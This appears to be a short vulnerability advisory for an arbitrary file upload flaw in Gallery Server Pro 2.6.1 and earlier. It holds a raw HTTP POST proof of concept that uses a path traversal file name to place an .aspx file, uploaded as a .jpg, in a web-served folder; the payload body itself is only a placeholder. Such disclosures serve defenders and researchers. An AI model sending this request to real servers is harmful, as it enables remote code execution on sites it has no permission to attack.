35 lines
No EOL
1.3 KiB
Text
35 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/59831/info
|
|
|
|
Gallery Server Pro is prone to a vulnerability that lets attackers upload arbitrary files.
|
|
|
|
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
|
|
|
Gallery Server Pro 2.6.1 and prior are vulnerable.
|
|
|
|
*********************************************************************
|
|
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1
|
|
Host: <vulnerablesite>
|
|
Referer:
|
|
http://www.example.com/gallery/default.aspx?g=task_addobjects&aid=2
|
|
Content-Length: 73459
|
|
Content-Type: multipart/form-data;
|
|
boundary=---------------------------41184676334
|
|
Cookie: <VALID COOKIE DATA>
|
|
Pragma: no-cache
|
|
Cache-Control: no-cache
|
|
|
|
-----------------------------41184676334
|
|
Content-Disposition: form-data; name="name"
|
|
|
|
..\..\gs\mediaobjects\Samples\malicious.aspx
|
|
-----------------------------41184676334
|
|
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
|
|
Content-Type: application/octet-stream
|
|
|
|
Malicious code here.
|
|
|
|
-----------------------------41184676334--
|
|
*********************************************************************
|
|
|
|
The uploaded file will then be available on the affected server at:
|
|
http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx |